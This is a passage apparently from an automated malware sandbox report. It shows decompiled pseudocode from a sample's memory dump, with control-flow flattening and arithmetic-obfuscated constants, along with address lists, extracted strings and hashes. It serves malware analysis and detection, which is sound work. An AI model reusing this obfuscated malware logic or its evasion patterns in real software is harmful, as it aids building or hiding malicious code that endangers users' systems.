													_t751 =  *(_t950 + 0x10);
													goto L14;
												} else {
													_t959 = _t806 - 0x13765d88;
													if(_t806 != 0x13765d88) {
														L44:
														__eflags = _t806 - 0x1a8884c7;
														if(__eflags != 0) {
															L14:
															_t896 =  *(_t950 + 0x14);
															continue;
														}
													} else {
														_push( *(_t950 + 0x108));
														_t787 = E0022889D(0x22c660,  *(_t950 + 0xa8), _t959);
														_t788 =  *0x22ca38; // 0x0
														_t790 =  *0x22ca38; // 0x0
														_t793 =  *0x22ca38; // 0x0
														E00227C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
														_t950 = _t950 + 0x2c;
														E00222025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
														_t799 =  *0x22ca38; // 0x0
														_t806 = 0x261be6d7;
														_t896 = ( *_t799)[4] & 0x0000ffff;
														_t751 =  *(_t950 + 0x10);
														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
														L2:
														L3:
														_t954 = _t806 - 0x1dc05553;
														if(_t954 > 0) {
															goto L27;
														}
													}
												}
											}
										}
									}
								}
							}
							L49:
							return _t946;
							L27:
							__eflags = _t806 - 0x23448a49;
							if(_t806 == 0x23448a49) {
								__eflags = E0022511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
								if(__eflags == 0) {
									_t806 = 0x6ef04;
									goto L44;
								} else {
									_t806 = 0x1a22d724;
									goto L13;
								}
							} else {
								__eflags = _t806 - 0x261be6d7;
								if(_t806 == 0x261be6d7) {
									_t918 = _t950 + 0x270;
									_t809 = 6;
									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
									__eflags = _t948;
									while(__eflags != 0) {
										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
										E0021D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
										_t950 = _t950 + 0x18;
										_t919 = _t918 + _t945 * 2;
										_t803 = 0x2f;
										 *_t919 = _t803;
										_t918 = _t919 + 2;
										_t948 = _t948 - 1;
										__eflags = _t948;
									}
									_t946 =  *(_t950 + 0x130);
									 *_t918 = 0;
									_t806 = 0x1a0940a4;
									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
									goto L1;
								} else {
									__eflags = _t806 - 0x2a19e3bf;
									if(_t806 == 0x2a19e3bf) {
										E0021F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
										_t806 = 0x355eeb92;
										goto L13;
									} else {
										__eflags = _t806 - 0x2ca20b85;
										if(_t806 == 0x2ca20b85) {
											 *(_t950 + 0x12c) = E00228C8F(_t806);
											_t806 = 0x9a9cbcb;
											goto L13;
										} else {
											__eflags = _t806 - 0x355eeb92;
											if(_t806 == 0x355eeb92) {
												E0021F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
												_t806 = 0x6ef04;
												goto L13;
											} else {
												__eflags = _t806 - 0x36d580c3;
												if(_t806 == 0x36d580c3) {
													_push(_t805);
													_push( *(_t950 + 0xc0));
													_t903 =  *(_t950 + 0xcc);
													_t817 =  *(_t950 + 0x100);
													goto L48;
												} else {
													__eflags = _t806 - 0x397d406a;
													if(_t806 != 0x397d406a) {
														goto L44;
													} else {
														_t820 =  *(_t950 + 0x118);
														E0021F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
														_t950 = _t950 + 0x10;
														asm("sbb ecx, ecx");
														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
														goto L13;
													}
												}
											}
										}
									}
								}
							}
							goto L49;
						}
					}
				}
			}

0x00219fe6
0x00219fed
0x00219ff6
0x00219ffe
0x0021a005
0x0021a006
0x0021a00d
0x0021a00e
0x0021a00f
0x0021a014
0x0021a01f
0x0021a022
0x0021a02d
0x0021a02f
0x0021a038
0x0021a043
0x0021a048
0x0021a053
0x0021a067
0x0021a06c
0x0021a075
0x0021a080
0x0021a092
0x0021a097
0x0021a0a0
0x0021a0ab
0x0021a0b6
0x0021a0be
0x0021a0c6
0x0021a0ce
0x0021a0d9
0x0021a0e4
0x0021a0ec
0x0021a0f7
0x0021a102
0x0021a10d
0x0021a118
0x0021a120
0x0021a129
0x0021a12e
0x0021a134
0x0021a13c
0x0021a147
0x0021a152
0x0021a15a
0x0021a165
0x0021a177
0x0021a17a
0x0021a181
0x0021a188
0x0021a193
0x0021a19b
0x0021a1a0
0x0021a1a8
0x0021a1b0
0x0021a1b8
0x0021a1c0
0x0021a1ca
0x0021a1ce
0x0021a1d4
0x0021a1dc
0x0021a1e7
0x0021a1ef
0x0021a1fa
0x0021a202
0x0021a206
0x0021a20a
0x0021a20f
0x0021a217
0x0021a222
0x0021a22a
0x0021a232
0x0021a23d
0x0021a248
0x0021a253
0x0021a25e
0x0021a269
0x0021a271
0x0021a27c
0x0021a287
0x0021a292
0x0021a29a
0x0021a2a5
0x0021a2b0
0x0021a2bb
0x0021a2c6
0x0021a2db
0x0021a2de
0x0021a2df
0x0021a2e6
0x0021a2f1
0x0021a2fc
0x0021a304
0x0021a30c
0x0021a317
0x0021a32a
0x0021a331
0x0021a33c
0x0021a352
0x0021a359
0x0021a364
0x0021a36f
0x0021a382
0x0021a389
0x0021a394
0x0021a39f
0x0021a3aa
0x0021a3b2
0x0021a3bd
0x0021a3c5
0x0021a3cd
0x0021a3d2
0x0021a3da
0x0021a3e5
0x0021a3f0
0x0021a3fb
0x0021a406
0x0021a411
0x0021a41c
0x0021a427
0x0021a42f
0x0021a434
0x0021a43c
0x0021a444
0x0021a44c
0x0021a460
0x0021a467
0x0021a472
0x0021a47d
0x0021a487
0x0021a492
0x0021a49d
0x0021a4a5
0x0021a4b0
0x0021a4be
0x0021a4c3
0x0021a4ce
0x0021a4d1
0x0021a4d5
0x0021a4da
0x0021a4e2
0x0021a4ea
0x0021a4f2
0x0021a4f7
0x0021a4ff
0x0021a507
0x0021a512
0x0021a51a
0x0021a525
0x0021a530
0x0021a538
0x0021a53d
0x0021a545
0x0021a54d
0x0021a558
0x0021a563
0x0021a56e
0x0021a57e
0x0021a582
0x0021a58a
0x0021a58e
0x0021a596
0x0021a59e
0x0021a5a6
0x0021a5ab
0x0021a5b3
0x0021a5bb
0x0021a5c6
0x0021a5d1
0x0021a5dc
0x0021a5e7
0x0021a5f2
0x0021a5fd
0x0021a609
0x0021a60c
0x0021a610
0x0021a618
0x0021a61d
0x0021a625
0x0021a638
0x0021a63f
0x0021a64a
0x0021a652
0x0021a657
0x0021a65c
0x0021a664
0x0021a66c
0x0021a679
0x0021a67d
0x0021a685
0x0021a68d
0x0021a695
0x0021a6a5
0x0021a6aa
0x0021a6b0
0x0021a6b5
0x0021a6bd
0x0021a6c5
0x0021a6ce
0x0021a6d3
0x0021a6dd
0x0021a6e2
0x0021a6e8
0x0021a6f0
0x0021a6fb
0x0021a706
0x0021a711
0x0021a719
0x0021a71e
0x0021a723
0x0021a72b
0x0021a733
0x0021a73b
0x0021a740
0x0021a748
0x0021a750
0x0021a758
0x0021a75d
0x0021a762
0x0021a76a
0x0021a776
0x0021a77b
0x0021a785
0x0021a78a
0x0021a790
0x0021a798
0x0021a7a0
0x0021a7ab
0x0021a7b6
0x0021a7c1
0x0021a7d3
0x0021a7d8
0x0021a7e9
0x0021a7ea
0x0021a7f1
0x0021a7fc
0x0021a807
0x0021a80f
0x0021a81a
0x0021a825
0x0021a830
0x0021a83b
0x0021a846
0x0021a854
0x0021a858
0x0021a860
0x0021a868
0x0021a872
0x0021a87d
0x0021a888
0x0021a893
0x0021a89b
0x0021a8a0
0x0021a8a5
0x0021a8ad
0x0021a8b5
0x0021a8c0
0x0021a8cb
0x0021a8d6
0x0021a8e1
0x0021a8ec
0x0021a8f7
0x0021a902
0x0021a90d
0x0021a918
0x0021a923
0x0021a92b
0x0021a936
0x0021a941
0x0021a955
0x0021a95a
0x0021a961
0x0021a96c
0x0021a977
0x0021a982
0x0021a989
0x0021a991
0x0021a99c
0x0021a9a4
0x0021a9ac
0x0021a9b1
0x0021a9b9
0x0021a9c9
0x0021a9cf
0x0021a9d7
0x0021a9df
0x0021a9e7
0x0021a9ef
0x0021a9f8
0x0021a9fd
0x0021aa03
0x0021aa0b
0x0021aa1e
0x0021aa1f
0x0021aa26
0x0021aa31
0x0021aa3c
0x0021aa44
0x0021aa4f
0x0021aa5a
0x0021aa65
0x0021aa79
0x0021aa80
0x0021aa92
0x0021aa99
0x0021aa9d
0x0021aa9d
0x0021aa9d
0x0021aaa1
0x0021aaa1
0x0021aaa4
0x0021aaa4
0x0021aaa4
0x0021aaaa
0x00000000
0x00000000
0x0021aab0
0x0021aab0
0x0021adbb
0x0021ae14
0x0021ae19
0x0021ae2d
0x0021ae32
0x0021ae38
0x0021aa9d
0x0021aa9d
0x0021aa9d
0x00000000
0x0021aa9d
0x0021aab6
0x0021aab6
0x0021aabc
0x0021ace5
0x0021aceb
0x0021adaa
0x0021adb1
0x00000000
0x0021acf1
0x0021acf1
0x0021acf7
0x0021ad88
0x0021ad8d
0x00000000
0x0021acfd
0x0021acfd
0x0021ad03
0x00000000
0x0021ad09
0x0021ad10
0x0021ad26
0x0021ad2e
0x0021ad64
0x0021ad69
0x0021ad6e
0x0021ad76
0x00000000
0x0021ad76
0x0021ad03
0x0021acf7
0x0021aac2
0x0021aac2
0x0021acac
0x0021acbb
0x0021acc2
0x0021acc9
0x0021acd1
0x0021acd2
0x0021acda
0x00000000
0x0021aac8
0x0021aace
0x0021ac86
0x0021ac8d
0x00000000
0x0021aad4
0x0021aada
0x0021ac01
0x0021ac02
0x0021ac0b
0x0021ac0d
0x0021ac29
0x0021ac2d
0x0021ac2f
0x0021ac4c
0x0021ac51
0x0021ac54
0x0021ac58
0x0021ac5a
0x0021b013
0x0021b014
0x0021b01b
0x0021b022
0x0021b041
0x0021b041
0x0021ac60
0x0021ac60
0x0021aa9d
0x0021aa9d
0x0021aa9d
0x00000000
0x0021aa9d
0x0021aa9d
0x0021ac5a
0x0021aae0
0x0021aae6
0x0021abcb
0x0021abcf
0x0021abd2
0x0021abd7
0x0021abde
0x0021abde
0x00000000
0x0021aaec
0x0021aaec
0x0021aaf2
0x0021b006
0x0021b006
0x0021b00c
0x0021abe2
0x0021abe2
0x00000000
0x0021abe2
0x0021aaf8
0x0021aaf8
0x0021ab0b
0x0021ab12
0x0021ab3b
0x0021ab4e
0x0021ab6c
0x0021ab71
0x0021ab85
0x0021ab8a
0x0021ab91
0x0021ab98
0x0021ab9c
0x0021aba0
0x0021aaa1
0x0021aaa4
0x0021aaa4
0x0021aaaa
0x00000000
0x00000000
0x0021aaaa
0x0021aaf2
0x0021aae6
0x0021aada
0x0021aace
0x0021aac2
0x0021aabc
0x0021b04a
0x0021b054
0x0021ae42
0x0021ae42
0x0021ae48
0x0021afef
0x0021aff1
0x0021b001
0x00000000
0x0021aff3
0x0021aff3
0x00000000
0x0021aff3
0x0021ae4e
0x0021ae4e
0x0021ae54
0x0021af59
0x0021af64
0x0021af69
0x0021af69
0x0021af6a
0x0021af94
0x0021af9b
0x0021afa0
0x0021afa3
0x0021afa8
0x0021afa9
0x0021afac
0x0021afaf
0x0021afaf
0x0021afaf
0x0021afb2
0x0021afbb
0x0021afbe
0x0021afc7
0x00000000
0x0021ae5a
0x0021ae5a
0x0021ae60
0x0021af41
0x0021af48
0x00000000
0x0021ae66
0x0021ae66
0x0021ae6c
0x0021af1a
0x0021af21
0x00000000
0x0021ae72
0x0021ae72
0x0021ae78
0x0021aef6
0x0021aefd
0x00000000
0x0021ae7a
0x0021ae7a
0x0021ae80
0x0021b02b
0x0021b02c
0x0021b033
0x0021b03a
0x00000000
0x0021ae86
0x0021ae86
0x0021ae8c
0x00000000
0x0021ae92
0x0021aeb5
0x0021aebd
0x0021aec2
0x0021aec7
0x0021aecf
0x00000000
0x0021aecf
0x0021ae8c
0x0021ae80
0x0021ae78
0x0021ae6c
0x0021ae60
0x0021ae54
0x00000000
0x0021ae48
0x0021aaa4
0x0021aaa1

Strings

"m, xrefs: 0021A860
Q, xrefs: 0021A7C1
{, xrefs: 0021A893
25, xrefs: 0021A33C
%, xrefs: 0021A3BD
M#, xrefs: 0021A0EC
}=, xrefs: 0021A762
<8, xrefs: 0021A134
w, xrefs: 0021A44C
cA, xrefs: 0021A15A
./, xrefs: 0021A492
=;, xrefs: 0021A102
NS5, xrefs: 0021A750
nXj, xrefs: 0021A014
j@}9, xrefs: 0021AE86
Lf, xrefs: 0021A625
KZ, xrefs: 0021A5DC
C/, xrefs: 0021A76A
m, xrefs: 0021A10D
tu, xrefs: 0021A706
q, xrefs: 0021A4DA
Z9, xrefs: 0021A427
jg, xrefs: 0021A165
Q[, xrefs: 0021A188
dW, xrefs: 0021AA80
#}, xrefs: 0021A507
E, xrefs: 0021A991
p=4E, xrefs: 0021A8E1
S', xrefs: 0021A72B
5a, xrefs: 0021A5FD
m9, xrefs: 0021A61D

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
API String ID: 0-3061497230
Opcode ID: ed4548ccfe706216949519f15ce228afc07c98740e31bff7bdd71d7ef804a453
Instruction ID: 05e23363dbd89b318ca825108a23b74bf19307ea6e9e1fdb493571c15bd91e74
Opcode Fuzzy Hash: ed4548ccfe706216949519f15ce228afc07c98740e31bff7bdd71d7ef804a453
Instruction Fuzzy Hash: C182347151C3818BE378CF25C449B9FBBE1BBD4318F10891DE19A862A0DBB59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0021C769, Relevance: 24.4, Strings: 19, Instructions: 630
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0021C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
				_v208 = _v208 ^ 0x7134ef2f;
				_v116 = 0x28a4;
				_v116 = _v116 + 0xffff342e;
				_v116 = _v116 ^ 0xffff1cd2;
				_v124 = 0xa3bc;
				_v124 = _v124 + 0xffffb3e2;
				_v124 = _v124 ^ 0x0040579e;
				_v132 = 0x4a92;
				_v132 = _v132 << 0xb;
				_v132 = _v132 ^ 0x02509000;
				_v140 = 0xcc93;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 ^ 0x04000006;
				_v148 = 0xadf6;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x0008056f;
				_v216 = 0xcf16;
				_v216 = _v216 ^ 0x2caffd24;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x002cad32;
				_v296 = 0xe55e;
				_v296 = _v296 << 0x10;
				_v296 = _v296 + 0xffff79ea;
				_v296 = _v296 << 5;
				_v296 = _v296 ^ 0xabaf3c40;
				_v152 = 0xf9a;
				_v16 = 0;
				_v320 = 0;
				_v152 = _v152 * 0x3f;
				_v152 = _v152 ^ 0x8003d6e6;
				_v120 = 0x15;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0x00000054;
				_v144 = 0x2eae;
				_v144 = _v144 + 0x3c19;
				_v144 = _v144 ^ 0x00006ac4;
				_v56 = 0xab01;
				_t773 = 0x5e;
				_v56 = _v56 / _t773;
				_v56 = _v56 ^ 0x00004cb8;
				_v104 = 0x2a8e;
				_t774 = 0x2c;
				_v104 = _v104 / _t774;
				_v104 = _v104 ^ 0x000033ed;
				_v292 = 0xd22b;
				_v292 = _v292 | 0xd3babaa8;
				_t775 = 0x50;
				_v292 = _v292 * 0x6c;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00a58d92;
				_v96 = 0x39fa;
				_v96 = _v96 / _t775;
				_v96 = _v96 ^ 0x00002d01;
				_v240 = 0xf5d4;
				_v240 = _v240 ^ 0x5b9fa071;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x0b73efef;
				_v248 = 0x1311;
				_t776 = 0x42;
				_v248 = _v248 / _t776;
				_v248 = _v248 + 0x5e6d;
				_v248 = _v248 ^ 0x00004acc;
				_v88 = 0x907;
				_t777 = 0x6e;
				_v88 = _v88 * 0x48;
				_v88 = _v88 ^ 0x0002ff0c;
				_v36 = 0x8ec2;
				_v36 = _v36 / _t777;
				_v36 = _v36 ^ 0x00005772;
				_v260 = 0x4792;
				_v260 = _v260 << 0xd;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x00006a86;
				_v224 = 0x4f89;
				_v224 = _v224 + 0xffff3059;
				_t778 = 0x21;
				_v224 = _v224 * 0x6e;
				_v224 = _v224 ^ 0xffc8e4d3;
				_v48 = 0x8858;
				_v48 = _v48 + 0x804a;
				_v48 = _v48 ^ 0x00017e21;
				_v312 = 0xd58c;
				_v312 = _v312 | 0x45747a0f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 / _t778;
				_v312 = _v312 ^ 0x00008646;
				_v300 = 0xadcd;
				_v300 = _v300 >> 8;
				_v300 = _v300 << 9;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x00008fc4;
				_v268 = 0xd742;
				_t779 = 0x30;
				_v268 = _v268 / _t779;
				_v268 = _v268 + 0x61d9;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x00000191;
				_v204 = 0x8d76;
				_v204 = _v204 | 0x1111a955;
				_v204 = _v204 << 5;
				_v204 = _v204 ^ 0x2235a282;
				_v64 = 0x8939;
				_v64 = _v64 + 0xffff3fc4;
				_v64 = _v64 ^ 0xffff80c7;
				_v276 = 0x72;
				_v276 = _v276 * 0x7d;
				_v276 = _v276 + 0xffff8366;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x007facee;
				_v44 = 0xf34a;
				_v44 = _v44 + 0xffffbf38;
				_v44 = _v44 ^ 0x00008263;
				_v112 = 0x1dc0;
				_v112 = _v112 ^ 0x2c6551d7;
				_v112 = _v112 ^ 0x2c653ad3;
				_v228 = 0xc596;
				_v228 = _v228 ^ 0x9ca21630;
				_v228 = _v228 ^ 0x8f0fd5bf;
				_v228 = _v228 ^ 0x13ad7fff;
				_v196 = 0x8cfa;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0xfb4b109c;
				_v196 = _v196 ^ 0xfb4b1bca;
				_v236 = 0x2fd6;
				_v236 = _v236 << 7;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x005fedce;
				_v180 = 0x51a5;
				_v180 = _v180 ^ 0x4af0041f;
				_v180 = _v180 + 0xfffff3cf;
				_v180 = _v180 ^ 0x4af05e30;
				_v244 = 0x8950;
				_v244 = _v244 << 0xc;
				_v244 = _v244 | 0xbaabdb8a;
				_v244 = _v244 ^ 0xbabf869d;
				_v40 = 0xc836;
				_v40 = _v40 + 0xffff3474;
				_v40 = _v40 ^ 0xffff8af1;
				_v176 = 0x9727;
				_v176 = _v176 + 0xffffb8fc;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x00001e80;
				_v304 = 0x64c7;
				_v304 = _v304 + 0x56f7;
				_v304 = _v304 ^ 0x2de137fe;
				_v304 = _v304 + 0xaf99;
				_v304 = _v304 ^ 0x2de22ef8;
				_v308 = 0x2e06;
				_v308 = _v308 | 0x78777a1f;
				_v308 = _v308 * 0x79;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x1e0f1828;
				_v92 = 0xc9a2;
				_v92 = _v92 | 0xf3c29ea2;
				_v92 = _v92 ^ 0xf3c28d84;
				_v100 = 0xecbf;
				_v100 = _v100 + 0xffff0faf;
				_v100 = _v100 ^ 0xffffc0a5;
				_v192 = 0x95e0;
				_v192 = _v192 << 8;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x2bc00f3b;
				_v200 = 0x7c40;
				_t780 = 0x3a;
				_v200 = _v200 / _t780;
				_v200 = _v200 << 8;
				_v200 = _v200 ^ 0x000244df;
				_v272 = 0x7605;
				_v272 = _v272 << 5;
				_v272 = _v272 + 0xffffdeaf;
				_v272 = _v272 >> 0xb;
				_v272 = _v272 ^ 0x00001482;
				_v108 = 0x1c78;
				_v108 = _v108 + 0x3c33;
				_v108 = _v108 ^ 0x00006c40;
				_v280 = 0xd61a;
				_v280 = _v280 ^ 0xfb8fe6a7;
				_v280 = _v280 + 0x5fc;
				_v280 = _v280 | 0xbad3e440;
				_v280 = _v280 ^ 0xfbdf8156;
				_v288 = 0x89a2;
				_v288 = _v288 + 0xffff4641;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x000071e8;
				_v252 = 0xe21c;
				_v252 = _v252 ^ 0x457ecc8f;
				_t781 = 0x67;
				_v252 = _v252 * 0x59;
				_v252 = _v252 ^ 0x28de7ded;
				_v84 = 0xe1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x00001e3a;
				_v184 = 0xbeeb;
				_v184 = _v184 * 0x12;
				_v184 = _v184 + 0x8ae1;
				_v184 = _v184 ^ 0x000de1ad;
				_v68 = 0xfd10;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000036f7;
				_v76 = 0x1f03;
				_v76 = _v76 * 0x49;
				_v76 = _v76 ^ 0x000897f9;
				_v264 = 0xf0d9;
				_v264 = _v264 * 0x66;
				_v264 = _v264 + 0xffffb5cf;
				_v264 = _v264 + 0xea22;
				_v264 = _v264 ^ 0x0060dcb6;
				_v168 = 0xdfa9;
				_v168 = _v168 ^ 0x7c3d7298;
				_v168 = _v168 ^ 0xd2777362;
				_v168 = _v168 ^ 0xae4ad343;
				_v72 = 0x8534;
				_v72 = _v72 ^ 0x085524ca;
				_v72 = _v72 ^ 0x085595c2;
				_v136 = 0x90f3;
				_v136 = _v136 + 0xcfad;
				_v136 = _v136 ^ 0x00017ab2;
				_v220 = 0x7eee;
				_v220 = _v220 >> 3;
				_v220 = _v220 + 0xffffea23;
				_v220 = _v220 ^ 0xffffcf89;
				_v164 = 0x31cc;
				_v164 = _v164 | 0x82d13576;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x105a14dc;
				_v284 = 0xab9f;
				_v284 = _v284 / _t781;
				_v284 = _v284 + 0xffff982b;
				_v284 = _v284 + 0xcf45;
				_v284 = _v284 ^ 0x000072b9;
				_v80 = 0x4458;
				_v80 = _v80 + 0xfa7e;
				_v80 = _v80 ^ 0x000168e1;
				_v128 = 0x89b9;
				_v128 = _v128 + 0xe32e;
				_v128 = _v128 ^ 0x00010bac;
				_v172 = 0xe617;
				_v172 = _v172 << 4;
				_v172 = _v172 + 0xb499;
				_v172 = _v172 ^ 0x000f5cd6;
				_v212 = 0x2b1d;
				_v212 = _v212 << 0x10;
				_t782 = 0x21;
				_v212 = _v212 * 0x7f;
				_v212 = _v212 ^ 0x63636a51;
				_v188 = 0x87b6;
				_v188 = _v188 | 0xa87ad713;
				_v188 = _v188 << 3;
				_v188 = _v188 ^ 0x43d6c05c;
				_v60 = 0x1ec0;
				_v60 = _v60 / _t782;
				_v60 = _v60 ^ 0x000042c8;
				_v256 = 0x1798;
				_v256 = _v256 ^ 0x8091dd24;
				_v256 = _v256 | 0xdc47dedf;
				_t783 = 0x19;
				_v256 = _v256 * 0x5d;
				_v256 = _v256 ^ 0x3a6c6c2e;
				_v160 = 0x6f3f;
				_v160 = _v160 / _t783;
				_t784 = 0x73;
				_t785 = _v20;
				_v160 = _v160 / _t784;
				_v160 = _v160 ^ 0x00005ad1;
				while(1) {
					L1:
					_t758 = 0x1fbed331;
					while(1) {
						_t797 = _t786 - _t758;
						if(_t797 <= 0) {
						}
						L3:
						if(_t797 == 0) {
							__eflags = E00215B79(_t785, _v20);
							_t786 = 0x1b724d6a;
							_t679 = 1;
							_t793 =  !=  ? _t679 : _t793;
							L13:
							_t666 = _v316;
							L14:
							_t707 = _v320;
							goto L1;
						}
						if(_t786 == 0xa0d70be) {
							__eflags = _t694;
							if(_t694 == 0) {
								_t718 = 0;
								__eflags = 0;
							} else {
								_t718 =  *_t694;
							}
							__eflags = _t694;
							if(_t694 == 0) {
								_t680 = 0;
								__eflags = 0;
							} else {
								_t680 =  *((intOrPtr*)(_t694 + 4));
							}
							E00228422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
							_t795 = _t795 + 0x1c;
							asm("sbb esi, esi");
							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
							goto L13;
						}
						if(_t786 == 0xcd25e5e) {
							_t786 = 0x25fbc0d1;
							while(1) {
								_t797 = _t786 - _t758;
								if(_t797 <= 0) {
								}
								goto L25;
							}
							goto L3;
						}
						if(_t786 == 0xdfc12f5) {
							_t666 = E00227955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
							_t795 = _t795 + 0x34;
							_v316 = _t666;
							__eflags = _t666;
							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
							goto L14;
						}
						if(_t786 == 0x1b724d6a) {
							E00217925(_v284, _t785, _v80, _v128);
							_t786 = 0x2cd2473d;
							L12:
							goto L13;
						}
						if(_t786 != 0x1e7ff602) {
							L45:
							__eflags = _t786 - 0x258a7eda;
							if(_t786 == 0x258a7eda) {
								L10:
								return _t793;
							}
							_t666 = _v316;
							continue;
						}
						E00217925(_v60, _v32, _v256, _v160);
						goto L10;
						L25:
						__eflags = _t786 - 0x20246154;
						if(_t786 == 0x20246154) {
							__eflags = _t694;
							if(__eflags == 0) {
								_t787 = _v16;
							} else {
								_push(_v308);
								_t667 = E0022889D(0x22c850, _v304, __eflags);
								_t787 = _t667;
								_v16 = _t667;
							}
